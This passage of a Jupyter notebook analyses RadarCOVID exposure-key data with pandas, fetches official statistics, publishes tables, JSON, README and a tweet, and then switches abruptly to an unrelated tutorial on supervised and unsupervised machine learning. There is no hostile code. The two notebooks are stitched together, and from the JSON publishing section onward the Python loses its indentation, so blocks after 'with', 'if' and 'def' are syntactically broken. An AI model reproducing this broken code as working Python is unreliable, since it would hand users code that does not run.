shared_teks_generation_to_upload_df.tail()
# Today's newly shared TEKs by generation-to-upload delay.
today_new_teks_df = \
    shared_teks_generation_to_upload_df[
        shared_teks_generation_to_upload_df.upload_date == extraction_date].copy()
today_new_teks_df.tail()
if not today_new_teks_df.empty:
    today_new_teks_df.set_index("generation_to_upload_days") \
        .sort_index().shared_teks.plot.bar()
# Upload date x delay pivot used later for the heatmap table.
generation_to_upload_period_pivot_df = \
    shared_teks_generation_to_upload_df[
        ["upload_date", "generation_to_upload_days", "shared_teks"]] \
        .pivot(index="upload_date", columns="generation_to_upload_days") \
        .sort_index(ascending=False).fillna(0).astype(int) \
        .droplevel(level=0, axis=1)
generation_to_upload_period_pivot_df.head()
# New TEKs per upload date = size of the day-over-day set difference.
new_tek_df = tek_list_df.diff().tek_list.apply(
    lambda x: len(x) if not pd.isna(x) else None).to_frame().reset_index()
new_tek_df.rename(columns={
    "tek_list": "shared_teks_by_upload_date",
    "extraction_date": "sample_date_string",}, inplace=True)
new_tek_df.tail()
# TEKs uploaded on the same day they were generated (delay == 0).
shared_teks_uploaded_on_generation_date_df = shared_teks_generation_to_upload_df[
    shared_teks_generation_to_upload_df.generation_to_upload_days == 0] \
    [["upload_date", "shared_teks"]].rename(
        columns={
            "upload_date": "sample_date_string",
            "shared_teks": "shared_teks_uploaded_on_generation_date",
        })
shared_teks_uploaded_on_generation_date_df.head()
# Estimate shared diagnoses as the max per-generation-date TEK count of each
# upload day, then zero out dates flagged invalid via configuration.
estimated_shared_diagnoses_df = shared_teks_generation_to_upload_df \
    .groupby(["upload_date"]).shared_teks.max().reset_index() \
    .sort_values(["upload_date"], ascending=False) \
    .rename(columns={
        "upload_date": "sample_date_string",
        "shared_teks": "shared_diagnoses",
    })
invalid_shared_diagnoses_dates_mask = \
    estimated_shared_diagnoses_df.sample_date_string.isin(invalid_shared_diagnoses_dates)
estimated_shared_diagnoses_df[invalid_shared_diagnoses_dates_mask] = 0
estimated_shared_diagnoses_df.head()
```
### Hourly New TEKs
```
# Same new-TEK computation at hourly granularity over the last 25 dumps.
hourly_extracted_teks_df = load_extracted_teks(
    mode="Hourly", region=report_backend_identifier, limit=25)
hourly_extracted_teks_df.head()
hourly_new_tek_count_df = hourly_extracted_teks_df \
    .groupby("extraction_date_with_hour").tek_list. \
    apply(lambda x: set(sum(x, []))).reset_index().copy()
hourly_new_tek_count_df = hourly_new_tek_count_df.set_index("extraction_date_with_hour") \
    .sort_index(ascending=True)
# Hour-over-hour set difference -> count of newly seen TEKs.
hourly_new_tek_count_df["new_tek_list"] = hourly_new_tek_count_df.tek_list.diff()
hourly_new_tek_count_df["new_tek_count"] = hourly_new_tek_count_df.new_tek_list.apply(
    lambda x: len(x) if not pd.isna(x) else 0)
hourly_new_tek_count_df.rename(columns={
    "new_tek_count": "shared_teks_by_upload_date"}, inplace=True)
hourly_new_tek_count_df = hourly_new_tek_count_df.reset_index()[[
    "extraction_date_with_hour", "shared_teks_by_upload_date"]]
hourly_new_tek_count_df.head()
hourly_summary_df = hourly_new_tek_count_df.copy()
hourly_summary_df.set_index("extraction_date_with_hour", inplace=True)
hourly_summary_df = hourly_summary_df.fillna(0).astype(int).reset_index()
hourly_summary_df["datetime_utc"] = pd.to_datetime(
    hourly_summary_df.extraction_date_with_hour, format="%Y-%m-%d@%H")
hourly_summary_df.set_index("datetime_utc", inplace=True)
# Drop the first row: its diff against the previous hour is undefined.
hourly_summary_df = hourly_summary_df.tail(-1)
hourly_summary_df.head()
```
### Official Statistics
```
import requests
import pandas.io.json
# Fetch the official RadarCOVID KPI statistics and merge them with the locally
# stored history file.
official_stats_response = requests.get("https://radarcovid.covid19.gob.es/kpi/statistics/basics")
official_stats_response.raise_for_status()
# NOTE(review): pandas.io.json.json_normalize is deprecated in favor of
# pd.json_normalize.
official_stats_df_ = pandas.io.json.json_normalize(official_stats_response.json())
official_stats_df = official_stats_df_.copy()
official_stats_df["date"] = pd.to_datetime(official_stats_df["date"], dayfirst=True)
official_stats_df.head()
official_stats_column_map = {
    "date": "sample_date",
    "applicationsDownloads.totalAcummulated": "app_downloads_es_accumulated",
    "communicatedContagions.totalAcummulated": "shared_diagnoses_es_accumulated",
}
accumulated_suffix = "_accumulated"
# Per-day column names are derived by stripping the accumulated suffix.
accumulated_values_columns = \
    list(filter(lambda x: x.endswith(accumulated_suffix), official_stats_column_map.values()))
interpolated_values_columns = \
    list(map(lambda x: x[:-len(accumulated_suffix)], accumulated_values_columns))
official_stats_df = \
    official_stats_df[official_stats_column_map.keys()] \
    .rename(columns=official_stats_column_map)
official_stats_df["extraction_date"] = extraction_date
official_stats_df.head()
official_stats_path = "Data/Statistics/Current/RadarCOVID-Statistics.json"
previous_official_stats_df = pd.read_json(official_stats_path, orient="records", lines=True)
previous_official_stats_df["sample_date"] = pd.to_datetime(previous_official_stats_df["sample_date"], dayfirst=True)
official_stats_df = official_stats_df.append(previous_official_stats_df)
official_stats_df.head()
# Drop rows with zero accumulated diagnoses, keep the newest extraction per day.
official_stats_df = official_stats_df[~(official_stats_df.shared_diagnoses_es_accumulated == 0)]
official_stats_df.sort_values("extraction_date", ascending=False, inplace=True)
official_stats_df.drop_duplicates(subset=["sample_date"], keep="first", inplace=True)
official_stats_df.head()
# Persist the merged history back to disk.
official_stats_stored_df = official_stats_df.copy()
official_stats_stored_df["sample_date"] = official_stats_stored_df.sample_date.dt.strftime("%Y-%m-%d")
official_stats_stored_df.to_json(official_stats_path, orient="records", lines=True)
official_stats_df.drop(columns=["extraction_date"], inplace=True)
official_stats_df = confirmed_days_df.merge(official_stats_df, how="left")
official_stats_df.sort_values("sample_date", ascending=False, inplace=True)
official_stats_df.head()
# Interpolate the accumulated series across gaps, then differentiate to get
# per-day values (periods=-1 because rows are newest-first).
official_stats_df[accumulated_values_columns] = \
    official_stats_df[accumulated_values_columns] \
    .astype(float).interpolate(limit_area="inside")
official_stats_df[interpolated_values_columns] = \
    official_stats_df[accumulated_values_columns].diff(periods=-1)
official_stats_df.drop(columns="sample_date", inplace=True)
official_stats_df.head()
```
### Data Merge
```
# Merge all per-day series into a single summary table keyed by date string.
result_summary_df = exposure_keys_summary_df.merge(
    new_tek_df, on=["sample_date_string"], how="outer")
result_summary_df.head()
result_summary_df = result_summary_df.merge(
    shared_teks_uploaded_on_generation_date_df, on=["sample_date_string"], how="outer")
result_summary_df.head()
result_summary_df = result_summary_df.merge(
    estimated_shared_diagnoses_df, on=["sample_date_string"], how="outer")
result_summary_df.head()
result_summary_df = result_summary_df.merge(
    official_stats_df, on=["sample_date_string"], how="outer")
result_summary_df.head()
# Left-join onto the case series so the table is bounded by daily_summary_days.
result_summary_df = confirmed_eu_df.tail(daily_summary_days).merge(
    result_summary_df, on=["sample_date_string"], how="left")
result_summary_df.head()
result_summary_df = confirmed_es_df.tail(daily_summary_days).merge(
    result_summary_df, on=["sample_date_string"], how="left")
result_summary_df.head()
# Index by (sample_date, source_regions), newest first.
result_summary_df["sample_date"] = pd.to_datetime(result_summary_df.sample_date_string)
result_summary_df = result_summary_df.merge(source_regions_for_summary_df, how="left")
result_summary_df.set_index(["sample_date", "source_regions"], inplace=True)
result_summary_df.drop(columns=["sample_date_string"], inplace=True)
result_summary_df.sort_index(ascending=False, inplace=True)
result_summary_df.head()
with pd.option_context("mode.use_inf_as_na", True):
    result_summary_df = result_summary_df.fillna(0).astype(int)
# Derived ratios; NaN results (e.g. 0/0) are normalized to 0.
result_summary_df["teks_per_shared_diagnosis"] = \
    (result_summary_df.shared_teks_by_upload_date / result_summary_df.shared_diagnoses).fillna(0)
result_summary_df["shared_diagnoses_per_covid_case"] = \
    (result_summary_df.shared_diagnoses / result_summary_df.covid_cases).fillna(0)
result_summary_df["shared_diagnoses_per_covid_case_es"] = \
    (result_summary_df.shared_diagnoses_es / result_summary_df.covid_cases_es).fillna(0)
result_summary_df.head(daily_plot_days)
def compute_aggregated_results_summary(days) -> pd.DataFrame:
    """Aggregate the daily summary over a rolling window of *days* days.

    Case counts used as ratio denominators are masked to 0 on days without
    shared diagnoses, so both sides of each ratio cover the same days.
    """
    aggregated_result_summary_df = result_summary_df.copy()
    aggregated_result_summary_df["covid_cases_for_ratio"] = \
        aggregated_result_summary_df.covid_cases.mask(
            aggregated_result_summary_df.shared_diagnoses == 0, 0)
    aggregated_result_summary_df["covid_cases_for_ratio_es"] = \
        aggregated_result_summary_df.covid_cases_es.mask(
            aggregated_result_summary_df.shared_diagnoses_es == 0, 0)
    aggregated_result_summary_df = aggregated_result_summary_df \
        .sort_index(ascending=True).fillna(0).rolling(days).agg({
            "covid_cases": "sum",
            "covid_cases_es": "sum",
            "covid_cases_for_ratio": "sum",
            "covid_cases_for_ratio_es": "sum",
            "shared_teks_by_generation_date": "sum",
            "shared_teks_by_upload_date": "sum",
            "shared_diagnoses": "sum",
            "shared_diagnoses_es": "sum",
        }).sort_index(ascending=False)
    with pd.option_context("mode.use_inf_as_na", True):
        aggregated_result_summary_df = aggregated_result_summary_df.fillna(0).astype(int)
    # NOTE(review): unlike the daily table (TEKs / shared_diagnoses), this
    # divides by covid_cases_for_ratio — confirm this denominator is intended.
    aggregated_result_summary_df["teks_per_shared_diagnosis"] = \
        (aggregated_result_summary_df.shared_teks_by_upload_date /
         aggregated_result_summary_df.covid_cases_for_ratio).fillna(0)
    aggregated_result_summary_df["shared_diagnoses_per_covid_case"] = \
        (aggregated_result_summary_df.shared_diagnoses /
         aggregated_result_summary_df.covid_cases_for_ratio).fillna(0)
    aggregated_result_summary_df["shared_diagnoses_per_covid_case_es"] = \
        (aggregated_result_summary_df.shared_diagnoses_es /
         aggregated_result_summary_df.covid_cases_for_ratio_es).fillna(0)
    return aggregated_result_summary_df
aggregated_result_with_7_days_window_summary_df = compute_aggregated_results_summary(days=7)
aggregated_result_with_7_days_window_summary_df.head()
# Record index 1 skips the newest (possibly partial) day — presumably
# intentional; confirm against the publishing schedule.
last_7_days_summary = aggregated_result_with_7_days_window_summary_df.to_dict(orient="records")[1]
last_7_days_summary
# NOTE(review): window is 13 days despite the "14 days" name — confirm intended.
aggregated_result_with_14_days_window_summary_df = compute_aggregated_results_summary(days=13)
last_14_days_summary = aggregated_result_with_14_days_window_summary_df.to_dict(orient="records")[1]
last_14_days_summary
```
## Report Results
```
# Human-readable column/axis names used by the report tables and plots.
# (\u00A0 is a non-breaking space to keep labels on one line.)
display_column_name_mapping = {
    "sample_date": "Sample\u00A0Date\u00A0(UTC)",
    "source_regions": "Source Countries",
    "datetime_utc": "Timestamp (UTC)",
    "upload_date": "Upload Date (UTC)",
    "generation_to_upload_days": "Generation to Upload Period in Days",
    "region": "Backend",
    "region_x": "Backend\u00A0(A)",
    "region_y": "Backend\u00A0(B)",
    "common_teks": "Common TEKs Shared Between Backends",
    "common_teks_fraction": "Fraction of TEKs in Backend (A) Available in Backend (B)",
    "covid_cases": "COVID-19 Cases (Source Countries)",
    "shared_teks_by_generation_date": "Shared TEKs by Generation Date (Source Countries)",
    "shared_teks_by_upload_date": "Shared TEKs by Upload Date (Source Countries)",
    "shared_teks_uploaded_on_generation_date": "Shared TEKs Uploaded on Generation Date (Source Countries)",
    "shared_diagnoses": "Shared Diagnoses (Source Countries – Estimation)",
    "teks_per_shared_diagnosis": "TEKs Uploaded per Shared Diagnosis (Source Countries)",
    "shared_diagnoses_per_covid_case": "Usage Ratio (Source Countries)",
    "covid_cases_es": "COVID-19 Cases (Spain)",
    "app_downloads_es": "App Downloads (Spain – Official)",
    "shared_diagnoses_es": "Shared Diagnoses (Spain – Official)",
    "shared_diagnoses_per_covid_case_es": "Usage Ratio (Spain)",
}
# Columns shown in the daily summary table, in display order.
summary_columns = [
    "covid_cases",
    "shared_teks_by_generation_date",
    "shared_teks_by_upload_date",
    "shared_teks_uploaded_on_generation_date",
    "shared_diagnoses",
    "teks_per_shared_diagnosis",
    "shared_diagnoses_per_covid_case",
    "covid_cases_es",
    "app_downloads_es",
    "shared_diagnoses_es",
    "shared_diagnoses_per_covid_case_es",
]
# Ratio columns rendered as percentages in the plots.
summary_percentage_columns= [
    "shared_diagnoses_per_covid_case_es",
    "shared_diagnoses_per_covid_case",
]
```
### Daily Summary Table
```
# Keep a full copy before trimming to the display columns.
result_summary_df_ = result_summary_df.copy()
result_summary_df = result_summary_df[summary_columns]
result_summary_with_display_names_df = result_summary_df \
    .rename_axis(index=display_column_name_mapping) \
    .rename(columns=display_column_name_mapping)
result_summary_with_display_names_df
```
### Daily Summary Plots
```
# One bar subplot per summary column over the plotting window.
result_plot_summary_df = result_summary_df.head(daily_plot_days)[summary_columns] \
    .droplevel(level=["source_regions"]) \
    .rename_axis(index=display_column_name_mapping) \
    .rename(columns=display_column_name_mapping)
summary_ax_list = result_plot_summary_df.sort_index(ascending=True).plot.bar(
    title=f"Daily Summary",
    rot=45, subplots=True, figsize=(15, 30), legend=False)
ax_ = summary_ax_list[0]
ax_.get_figure().tight_layout()
ax_.get_figure().subplots_adjust(top=0.95)
_ = ax_.set_xticklabels(sorted(result_plot_summary_df.index.strftime("%Y-%m-%d").tolist()))
# Format the ratio subplots' y axes as percentages (value 1.0 == 100%).
for percentage_column in summary_percentage_columns:
    percentage_column_index = summary_columns.index(percentage_column)
    summary_ax_list[percentage_column_index].yaxis \
        .set_major_formatter(matplotlib.ticker.PercentFormatter(1.0))
```
### Daily Generation to Upload Period Table
```
# Heatmap of shared TEKs by upload date vs. generation-to-upload delay.
display_generation_to_upload_period_pivot_df = \
    generation_to_upload_period_pivot_df \
        .head(backend_generation_days)
display_generation_to_upload_period_pivot_df \
    .head(backend_generation_days) \
    .rename_axis(columns=display_column_name_mapping) \
    .rename_axis(index=display_column_name_mapping)
# Figure height scales with the number of upload dates displayed.
fig, generation_to_upload_period_pivot_table_ax = plt.subplots(
    figsize=(12, 1 + 0.6 * len(display_generation_to_upload_period_pivot_df)))
generation_to_upload_period_pivot_table_ax.set_title(
    "Shared TEKs Generation to Upload Period Table")
sns.heatmap(
    data=display_generation_to_upload_period_pivot_df
        .rename_axis(columns=display_column_name_mapping)
        .rename_axis(index=display_column_name_mapping),
    fmt=".0f",
    annot=True,
    ax=generation_to_upload_period_pivot_table_ax)
generation_to_upload_period_pivot_table_ax.get_figure().tight_layout()
```
### Hourly Summary Plots
```
# Hourly bar plots covering the last 24 hours of extractions.
hourly_summary_ax_list = hourly_summary_df \
    .rename_axis(index=display_column_name_mapping) \
    .rename(columns=display_column_name_mapping) \
    .plot.bar(
        title=f"Last 24h Summary",
        rot=45, subplots=True, legend=False)
ax_ = hourly_summary_ax_list[-1]
ax_.get_figure().tight_layout()
ax_.get_figure().subplots_adjust(top=0.9)
_ = ax_.set_xticklabels(sorted(hourly_summary_df.index.strftime("%Y-%m-%d@%H").tolist()))
```
### Publish Results
```
# Repository link for the published report; falls back to the upstream project.
github_repository = os.environ.get("GITHUB_REPOSITORY")
if github_repository is None:
    github_repository = "pvieito/Radar-STATS"
github_project_base_url = "https://github.com/" + github_repository
# Per-column HTML formatters: ratios as 2-decimal / percent; zeros blanked.
display_formatters = {
    display_column_name_mapping["teks_per_shared_diagnosis"]: lambda x: f"{x:.2f}" if x != 0 else "",
    display_column_name_mapping["shared_diagnoses_per_covid_case"]: lambda x: f"{x:.2%}" if x != 0 else "",
    display_column_name_mapping["shared_diagnoses_per_covid_case_es"]: lambda x: f"{x:.2%}" if x != 0 else "",
}
# Every other display column gets the generic zero-blanking formatter.
general_columns = \
    list(filter(lambda x: x not in display_formatters, display_column_name_mapping.values()))
general_formatter = lambda x: f"{x}" if x != 0 else ""
display_formatters.update(dict(map(lambda x: (x, general_formatter), general_columns)))
daily_summary_table_html = result_summary_with_display_names_df \
    .head(daily_plot_days) \
    .rename_axis(index=display_column_name_mapping) \
    .rename(columns=display_column_name_mapping) \
    .to_html(formatters=display_formatters)
multi_backend_summary_table_html = multi_backend_summary_df \
    .head(daily_plot_days) \
    .rename_axis(columns=display_column_name_mapping) \
    .rename(columns=display_column_name_mapping) \
    .rename_axis(index=display_column_name_mapping) \
    .to_html(formatters=display_formatters)
def format_multi_backend_cross_sharing_fraction(x):
    """Render a cross-sharing fraction for the HTML table.

    Missing values become "-", fractions that round to 0.0% become an empty
    string, everything else is shown as a one-decimal percentage.
    """
    if pd.isna(x):
        return "-"
    if round(x * 100, 1) == 0:
        return ""
    return f"{x:.1%}"
multi_backend_cross_sharing_summary_table_html = multi_backend_cross_sharing_summary_df \
    .rename_axis(columns=display_column_name_mapping) \
    .rename(columns=display_column_name_mapping) \
    .rename_axis(index=display_column_name_mapping) \
    .to_html(
        classes="table-center",
        formatters=display_formatters,
        float_format=format_multi_backend_cross_sharing_fraction)
# Center-align the table rows in the emitted HTML.
multi_backend_cross_sharing_summary_table_html = \
    multi_backend_cross_sharing_summary_table_html \
        .replace("<tr>","<tr style=\"text-align: center;\">")
# Scalar headline figures for today's extraction.
extraction_date_result_summary_df = \
    result_summary_df[result_summary_df.index.get_level_values("sample_date") == extraction_date]
extraction_date_result_hourly_summary_df = \
    hourly_summary_df[hourly_summary_df.extraction_date_with_hour == extraction_date_with_hour]
covid_cases = \
    extraction_date_result_summary_df.covid_cases.item()
shared_teks_by_generation_date = \
    extraction_date_result_summary_df.shared_teks_by_generation_date.item()
shared_teks_by_upload_date = \
    extraction_date_result_summary_df.shared_teks_by_upload_date.item()
shared_diagnoses = \
    extraction_date_result_summary_df.shared_diagnoses.item()
teks_per_shared_diagnosis = \
    extraction_date_result_summary_df.teks_per_shared_diagnosis.item()
shared_diagnoses_per_covid_case = \
    extraction_date_result_summary_df.shared_diagnoses_per_covid_case.item()
shared_teks_by_upload_date_last_hour = \
    extraction_date_result_hourly_summary_df.shared_teks_by_upload_date.sum().astype(int)
# Compact label for the source-regions set: single code, or "<N> 🇪🇺".
display_source_regions = ", ".join(report_source_regions)
if len(report_source_regions) == 1:
    display_brief_source_regions = report_source_regions[0]
else:
    display_brief_source_regions = f"{len(report_source_regions)} 🇪🇺"
def get_temporary_image_path() -> str:
    """Return a unique PNG file path inside the system temp directory."""
    unique_filename = f"{uuid.uuid4()}.png"
    return os.path.join(tempfile.gettempdir(), unique_filename)
def save_temporary_plot_image(ax):
    """Save the figure behind *ax* to a temporary PNG and return its path.

    Accepts either a single Axes or an array of Axes (as returned by
    subplot helpers); in the latter case the first Axes is used.
    """
    target_ax = ax[0] if isinstance(ax, np.ndarray) else ax
    output_path = get_temporary_image_path()
    target_ax.get_figure().savefig(output_path)
    return output_path
def save_temporary_dataframe_image(df):
    """Render *df* as a styled table image in a temporary PNG and return its path."""
    import dataframe_image as dfi
    styled_table = df.copy().style.format(display_formatters)
    output_path = get_temporary_image_path()
    dfi.export(styled_table, output_path)
    return output_path
# Render each figure and table to a temporary PNG for publishing below.
summary_plots_image_path = save_temporary_plot_image(
ax=summary_ax_list)
summary_table_image_path = save_temporary_dataframe_image(
df=result_summary_with_display_names_df)
hourly_summary_plots_image_path = save_temporary_plot_image(
ax=hourly_summary_ax_list)
multi_backend_summary_table_image_path = save_temporary_dataframe_image(
df=multi_backend_summary_df)
generation_to_upload_period_pivot_table_image_path = save_temporary_plot_image(
ax=generation_to_upload_period_pivot_table_ax)
```
### Save Results
```
# All published report artifacts share this filename prefix.
report_resources_path_prefix = "Data/Resources/Current/RadarCOVID-Report-"
# Persist the summary tables as CSV (plus HTML for the daily summary).
result_summary_df.to_csv(
report_resources_path_prefix + "Summary-Table.csv")
result_summary_df.to_html(
report_resources_path_prefix + "Summary-Table.html")
hourly_summary_df.to_csv(
report_resources_path_prefix + "Hourly-Summary-Table.csv")
multi_backend_summary_df.to_csv(
report_resources_path_prefix + "Multi-Backend-Summary-Table.csv")
multi_backend_cross_sharing_summary_df.to_csv(
report_resources_path_prefix + "Multi-Backend-Cross-Sharing-Summary-Table.csv")
generation_to_upload_period_pivot_df.to_csv(
report_resources_path_prefix + "Generation-Upload-Period-Table.csv")
# Copy the rendered PNG images from the temp directory to the report folder.
_ = shutil.copyfile(
summary_plots_image_path,
report_resources_path_prefix + "Summary-Plots.png")
_ = shutil.copyfile(
summary_table_image_path,
report_resources_path_prefix + "Summary-Table.png")
_ = shutil.copyfile(
hourly_summary_plots_image_path,
report_resources_path_prefix + "Hourly-Summary-Plots.png")
_ = shutil.copyfile(
multi_backend_summary_table_image_path,
report_resources_path_prefix + "Multi-Backend-Summary-Table.png")
_ = shutil.copyfile(
generation_to_upload_period_pivot_table_image_path,
report_resources_path_prefix + "Generation-Upload-Period-Table.png")
```
### Publish Results as JSON
```
def generate_summary_api_results(df: pd.DataFrame) -> list:
    """Convert a summary dataframe into a list of JSON-friendly record dicts.

    Adds a "sample_date_string" (YYYY-MM-DD) column derived from the
    "sample_date" index level, and splits the comma-separated
    "source_regions" string into a list per record.
    """
    records_df = df.reset_index().copy()
    records_df["sample_date_string"] = \
        records_df["sample_date"].dt.strftime("%Y-%m-%d")
    records_df["source_regions"] = \
        records_df["source_regions"].apply(lambda regions: regions.split(","))
    return records_df.to_dict(orient="records")
# Per-day records for the API payload.
summary_api_results = \
generate_summary_api_results(df=result_summary_df)
# Today's record only (the single row for the current extraction date).
today_summary_api_results = \
generate_summary_api_results(df=extraction_date_result_summary_df)[0]
# Assemble the full JSON payload for publication.
summary_results = dict(
backend_identifier=report_backend_identifier,
source_regions=report_source_regions,
extraction_datetime=extraction_datetime,
extraction_date=extraction_date,
extraction_date_with_hour=extraction_date_with_hour,
last_hour=dict(
shared_teks_by_upload_date=shared_teks_by_upload_date_last_hour,
shared_diagnoses=0,
),
today=today_summary_api_results,
last_7_days=last_7_days_summary,
last_14_days=last_14_days_summary,
daily_results=summary_api_results)
# Round-trip through pandas JSON serialization so non-JSON-native values
# (e.g. timestamps and numpy scalars) become plain JSON types.
summary_results = \
json.loads(pd.Series([summary_results]).to_json(orient="records"))[0]
with open(report_resources_path_prefix + "Summary-Results.json", "w") as f:
json.dump(summary_results, f, indent=4)
```
### Publish on README
```
# Fill the README template with the freshly generated tables and metadata,
# then overwrite the repository README with the result.
with open("Data/Templates/README.md", "r") as f:
readme_contents = f.read()
readme_contents = readme_contents.format(
extraction_date_with_hour=extraction_date_with_hour,
github_project_base_url=github_project_base_url,
daily_summary_table_html=daily_summary_table_html,
multi_backend_summary_table_html=multi_backend_summary_table_html,
multi_backend_cross_sharing_summary_table_html=multi_backend_cross_sharing_summary_table_html,
display_source_regions=display_source_regions)
with open("README.md", "w") as f:
f.write(readme_contents)
```
### Publish on Twitter
```
# Only tweet from scheduled CI runs, and only when there were uploads in
# the last hour or the day's results are final.
enable_share_to_twitter = os.environ.get("RADARCOVID_REPORT__ENABLE_PUBLISH_ON_TWITTER")
github_event_name = os.environ.get("GITHUB_EVENT_NAME")
if enable_share_to_twitter and github_event_name == "schedule" and \
(shared_teks_by_upload_date_last_hour or not are_today_results_partial):
import tweepy
# Credentials arrive as one colon-separated secret with four parts:
# consumer key/secret, then access token/secret (indices 0..3 below).
twitter_api_auth_keys = os.environ["RADARCOVID_REPORT__TWITTER_API_AUTH_KEYS"]
twitter_api_auth_keys = twitter_api_auth_keys.split(":")
auth = tweepy.OAuthHandler(twitter_api_auth_keys[0], twitter_api_auth_keys[1])
auth.set_access_token(twitter_api_auth_keys[2], twitter_api_auth_keys[3])
api = tweepy.API(auth)
# Upload the report images and collect their media IDs for the status.
summary_plots_media = api.media_upload(summary_plots_image_path)
summary_table_media = api.media_upload(summary_table_image_path)
generation_to_upload_period_pivot_table_image_media = api.media_upload(generation_to_upload_period_pivot_table_image_path)
media_ids = [
summary_plots_media.media_id,
summary_table_media.media_id,
generation_to_upload_period_pivot_table_image_media.media_id,
]
# Flag intraday (partial) figures in the tweet text.
if are_today_results_partial:
today_addendum = " (Partial)"
else:
today_addendum = ""
def format_shared_diagnoses_per_covid_case(value) -> str:
    """Format a usage ratio for the tweet: en dash for zero, else "≤X.XX%"."""
    return "–" if value == 0 else f"≤{value:.2%}"
# Pre-format the usage ratios that appear in the tweet body.
display_shared_diagnoses_per_covid_case = \
format_shared_diagnoses_per_covid_case(value=shared_diagnoses_per_covid_case)
display_last_14_days_shared_diagnoses_per_covid_case = \
format_shared_diagnoses_per_covid_case(value=last_14_days_summary["shared_diagnoses_per_covid_case"])
display_last_14_days_shared_diagnoses_per_covid_case_es = \
format_shared_diagnoses_per_covid_case(value=last_14_days_summary["shared_diagnoses_per_covid_case_es"])
# Compose the tweet text; textwrap.dedent keeps the literal readable.
status = textwrap.dedent(f"""
#RadarCOVID – {extraction_date_with_hour}
Today{today_addendum}:
- Uploaded TEKs: {shared_teks_by_upload_date:.0f} ({shared_teks_by_upload_date_last_hour:+d} last hour)
- Shared Diagnoses: ≤{shared_diagnoses:.0f}
- Usage Ratio: {display_shared_diagnoses_per_covid_case}
Last 14 Days:
- Usage Ratio (Estimation): {display_last_14_days_shared_diagnoses_per_covid_case}
- Usage Ratio (Official): {display_last_14_days_shared_diagnoses_per_covid_case_es}
Info: {github_project_base_url}#documentation
""")
# Encode to UTF-8 bytes, then post with the uploaded images attached.
status = status.encode(encoding="utf-8")
api.update_status(status=status, media_ids=media_ids)
```
| github_jupyter |
# Advanced Analytics and Machine Learning Overview
This notebook offers a basic overview of advanced analytics, some example use cases, and a basic advanced analytics workflow.
## A Short Primer on Advanced Analytics
Advanced analytics refers to a variety of techniques aimed at solving the core problem of deriving insights and making predictions or recommendations based on data. The best organization for machine learning is structured based on the task that you’d like to perform. The most common tasks include:
* Supervised learning, including classification and regression, where the goal is to predict a label for each data point based on various features.
* Recommendation engines to suggest products to users based on behavior.
* Unsupervised learning, including clustering, anomaly detection, and topic modeling, where the goal is to discover structure in the data.
* Graph analytics tasks such as searching for patterns in a social network.
Let’s review each of these tasks along with some common machine learning and advanced analytics use cases. The following books are great resources for learning more about the individual analytics (and, as a bonus, they are freely available on the web):
[An Introduction to Statistical Learning](http://www-bcf.usc.edu/~gareth/ISL/) by Gareth James, Daniela Witten, Trevor Hastie, and Robert Tibshirani.
[Elements of Statistical Learning](https://web.stanford.edu/~hastie/ElemStatLearn/) by Trevor Hastie, Robert Tibshirani, and Jerome Friedman.
[Deep Learning](http://www.deeplearningbook.org/) by Ian Goodfellow, Yoshua Bengio, and Aaron Courville.
### Supervised Learning
Supervised learning is probably the most common type of machine learning. The goal is simple: using historical data that already has labels (often called the dependent or target variables), train a model to predict the values of those labels based on various features of the data points. One example would be to predict a person’s income (the dependent variable) based on age (a feature). This training process usually proceeds through an iterative optimization algorithm such as gradient descent. The training algorithm starts with a basic model and gradually improves it by adjusting various internal parameters (coefficients) during each training iteration. The result of this process is a trained model that you can use to make predictions on new data. There are a number of different tasks we’ll need to complete as part of the process of training and making predictions, such as measuring the success of trained models before using them in the field, but the fundamental principle is simple: train on historical data, ensure that it generalizes to data we didn’t train on, and then make predictions on new data.
We can further organize supervised learning based on the type of variable we’re looking to predict. We’ll get to that next.
**CLASSIFICATION**
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-supervised-classification.png?raw=true" width="400" align="center"/>
One common type of supervised learning is classification. Classification is the act of training an algorithm to predict a dependent variable that is categorical (belonging to a discrete, finite set of values). The most common case is binary classification, where our resulting model will make a prediction that a given item belongs to one of two groups. The canonical example is classifying email spam. Using a set of historical emails that are organized into groups of spam emails and not spam emails, we train an algorithm to analyze the words in, and any number of properties of, the historical emails and make predictions about them. Once we are satisfied with the algorithm’s performance, we use that model to make predictions about future emails the model has never seen before.
When we classify items into more than just two categories, we call this multiclass classification. For example, we may have four different categories of email (as opposed to the two categories in the previous paragraph): spam, personal, work related, and other. There are many use cases for classification, including:
* Predicting disease: A doctor or hospital might have a historical dataset of behavioral and physiological attributes of a set of patients. They could use this dataset to train a model on this historical data (and evaluate its success and ethical implications before applying it) and then leverage it to predict whether or not a patient has heart disease or not. This is an example of binary classification (healthy heart, unhealthy heart) or multiclass classification (healthy heart, or one of several different diseases).
* Classifying images: There are a number of applications from companies like Apple, Google, or Facebook that can predict who is in a given photo by running a classification model that has been trained on historical images of people in your past photos. Another common use case is to classify images or label the objects in images.
* Predicting customer churn: A more business-oriented use case might be predicting customer churn—that is, which customers are likely to stop using a service. You can do this by training a binary classifier on past customers that have churned (and not churned) and using it to try and predict whether or not current customers will churn.
* Buy or won’t buy: Companies often want to predict whether visitors of their website will purchase a given product. They might use information about users’ browsing pattern or attributes such as location in order to drive this prediction.
There are many more use cases for classification beyond these examples. We will introduce more use cases in the upcoming notebooks.
**REGRESSION**
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-supervised-regression.png?raw=true" width="400" align="center"/>
In classification, our dependent variable is a set of discrete values. In regression, we instead try to predict a continuous variable (a real number). In simplest terms, rather than predicting a category, we want to predict a value on a number line. The rest of the process is largely the same, which is why they’re both forms of supervised learning. We will train on historical data to make predictions about data we have never seen. Here are some typical examples:
* Predicting sales: A store may want to predict total product sales on a given date using historical sales data. There are a number of potential input variables, but a simple example might be using last week's sales data to predict the next day's sales.
* Predicting height: Based on the heights of two individuals, we might want to predict the heights of their potential children.
* Predicting the number of viewers of a show: A media company like Netflix might try to predict how many of their subscribers will watch a particular show.
### Unsupervised Learning
<img src="https://github.com/soltaniehha/Business-Analytics/blob/master/figs/10-01-unsupervised.png?raw=true" width="400" align="center"/>
Unsupervised learning is the act of trying to find patterns or discover the underlying structure in a given set of data. This differs from supervised learning because there is no dependent variable (label) to predict.
Some example use cases for unsupervised learning include:
* Anomaly detection: Given some standard event type often occurring over time, we might want to report when a nonstandard type of event occurs. For example, a security officer might want to receive notifications when a strange object (think vehicle, skater, or bicyclist) is observed on a pathway.
